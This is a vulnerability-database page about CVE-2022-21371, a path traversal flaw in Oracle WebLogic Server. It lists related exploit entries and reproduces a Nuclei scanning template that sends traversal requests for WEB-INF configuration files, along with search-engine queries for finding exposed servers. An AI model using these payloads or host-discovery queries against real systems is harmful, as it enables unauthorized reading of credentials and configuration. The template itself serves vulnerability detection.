| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Exploit for Path Traversal in Oracle Weblogic_Server | 5 Jun 202416:29 | – | githubexploit | |
| Exploit for Path Traversal in Oracle Weblogic_Server | 25 Aug 202214:12 | – | githubexploit | |
| Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion Vulnerability | 27 Jan 202200:00 | – | zdt | |
| CVE-2022-21371 | 19 Jan 202212:15 | – | attackerkb | |
| The vulnerability of the Web Container component of the Oracle WebLogic Server application server allows a perpetrator to gain unauthorized access to protected information. | 7 Apr 202200:00 | – | bdu_fstec | |
| CVE-2022-21371 | 26 Jan 202211:04 | – | circl | |
| Oracle WebLogic Server 路径遍历漏洞 | 18 Jan 202200:00 | – | cnnvd | |
| Oracle WebLogic Server Input Validation Error Vulnerability (CNVD-2022-05874) | 19 Jan 202200:00 | – | cnvd | |
| Oracle WebLogic Server Remote Code Execution (CVE-2022-21371) | 3 May 202200:00 | – | checkpoint_advisories | |
| CVE-2022-21371 | 19 Jan 202211:26 | – | cve |
id: CVE-2022-21371
info:
name: Oracle WebLogic Server Local File Inclusion
author: paradessia,narluin
severity: high
description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
impact: |
An attacker can read sensitive files containing credentials, configuration details, or other sensitive information.
remediation: |
Apply the latest security patches provided by Oracle to fix the vulnerability.
reference:
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
- http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html
- https://github.com/Mr-xn/CVE-2022-21371
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-21371
cwe-id: CWE-22
epss-score: 0.92331
epss-percentile: 0.99811
cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: weblogic_server
shodan-query:
- http.title:"oracle peoplesoft sign-in"
- product:"oracle weblogic"
fofa-query: title="oracle peoplesoft sign-in"
google-query: intitle:"oracle peoplesoft sign-in"
tags: cve,cve2022,lfi,weblogic,oracle,packetstorm,vkev,vuln
http:
- method: GET
raw:
- |+
GET {{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- .//WEB-INF/weblogic.xml
- .//WEB-INF/web.xml
stop-at-first-match: true
unsafe: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
condition: or
- type: dsl
dsl:
- 'contains(header, "text/xml")'
- 'contains(header, "application/xml")'
condition: or
- type: status
status:
- 200
# digest: 490a00463044022030b0fbcbcc8a681bb99bc2e59b75ae78871408c0e83c302d517ab767d109be3a0220703b41365fb384d982981b3037880ad761d89702d3249938afc11b638e4b7277:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation